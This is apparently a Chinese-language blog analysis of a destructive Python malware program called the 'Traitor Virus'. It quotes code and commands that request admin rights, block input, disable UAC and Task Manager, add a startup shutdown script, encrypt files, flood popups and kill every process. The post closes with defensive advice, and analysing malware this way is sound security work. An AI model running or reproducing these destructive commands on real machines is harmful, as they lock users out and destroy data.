【东雪莲病毒|罕见病毒|Traitor Virus】

恶意程序分析：东雪莲病毒（Traitor Virus）

项目地址：东雪莲病毒|罕见病毒|Traitor Virus(Github)

代码效果展示

---

一、代码概述

这是一款使用Python编写的恶意程序。在获取管理员权限后，会对计算机系统执行一系列破坏性操作，包括但不限于：

• 封锁用户输入
• 修改系统设置
• 自动下载程序
• 文件加密
• 禁用任务管理器
• 篡改系统图标
• 播放音视频文件
• 最终尝试杀死所有进程导致系统蓝屏崩溃

---

二、功能详细分析

1. 权限检测

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

if is_admin():
    # 恶意操作代码
else:
    if sys.version_info[0] == 3:
        ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)

• 运作机制：通过系统API检测管理员权限，未获取权限时尝试请求提权

---

2. 信息提示与输入封锁

tkinter.messagebox.showinfo('骂谁罕见呢？', '现在退出还来得及')
user32 = windll.LoadLibrary("C:\\Windows\\System32\\user32.dll")
user32.BlockInput(True)

• 双重攻击：弹出迷惑性提示框后，立即锁定键盘鼠标输入

---

3. 系统设置篡改

▶ 禁用UAC功能

def close_uac():
    # 通过注册表修改以下键值：
    # ConsentPromptBehaviorAdmin=0
    # EnableLUA=0
    # PromptOnSecureDesktop=0

• 后果：关闭用户账户控制(UAC)，为后续破坏扫清障碍

▶ 设置开机自启关机

def shuTdoWn():
    # 在启动目录创建shutdown.bat
    bat_content = "shutdown -s -t 60"

• 效果：系统启动60秒后自动关机

▶ 自动下载原神

def GenShin_DownLoad():
    # 创建自动下载批处理脚本
    set downurl=https://ys-api.mihoyo.com/.../pc_default

• 资源消耗：利用系统启动项静默下载大体积游戏文件

---

4. 进程终结与系统破坏

def close_explorer():
    run('taskkill /F /IM explorer.exe')

• 立即影响：导致桌面/任务栏消失，系统界面崩溃

---

5. 弹窗与音频攻击

for i in range(15):
    t0 = threading.Thread(target=boom3)  # 播放随机音频
    t1 = threading.Thread(target=boom2)  # 创建弹窗

• 拒绝服务攻击：通过多线程制造大量弹窗和音频播放，耗尽系统资源

---

6. 文件加密系统

def encrypt_file(file_path):
    # 使用3DES加密算法
    # 修改文件扩展名为.hanjian

• 数据绑架：递归加密当前目录所有文件，密钥未妥善保存导致永久性数据丢失

---

7. 系统功能破坏

def disable_task_manager():
    # 注册表路径：HKEY_CURRENT_USER\...\System
    # 设置DisableTaskMgr=1

• 反制措施：禁用任务管理器阻止用户终止恶意进程

---

8. EXE图标篡改

def set_exe_icon():
    # 修改注册表HKEY_CLASSES_ROOT\exefile\DefaultIcon

• 视觉欺骗：将所有可执行文件图标替换为特定图案

---

9. 终极系统摧毁

if is_admin():
    os.system("Taskkill /fi \"pid ge 1\" /f")

• 致命操作：强制结束所有进程导致系统蓝屏崩溃

---

三、⚠️安全警告⚠️

1. 谨慎运行程序
   切勿随意执行来源不明的可执行文件，尤其警惕".bat"后缀脚本

2. 权限最小化原则
   日常使用避免使用管理员账户，对权限请求保持警惕

3. 系统防护措施

   • 保持Windows Defender实时保护开启
   • 定期进行全盘扫描
   • 及时安装系统安全更新

4. 数据备份策略
   采用3-2-1备份原则：至少3份副本，2种介质，1份异地存储

5. UAC保护机制
   保持用户账户控制设置为默认级别，不要禁用安全提示

---

四、防御建议

• 企业环境部署EDR解决方案
• 个人用户安装火绒/卡巴斯基等安全软件
• 定期检查系统启动项（msconfig）
• 监控注册表关键路径变更
• 对重要文件实施加密备份

---

技术分析：网络小白_Uncle城 | 发布日期：2025-01-28
（注：本文仅作技术研究，严禁用于非法用途）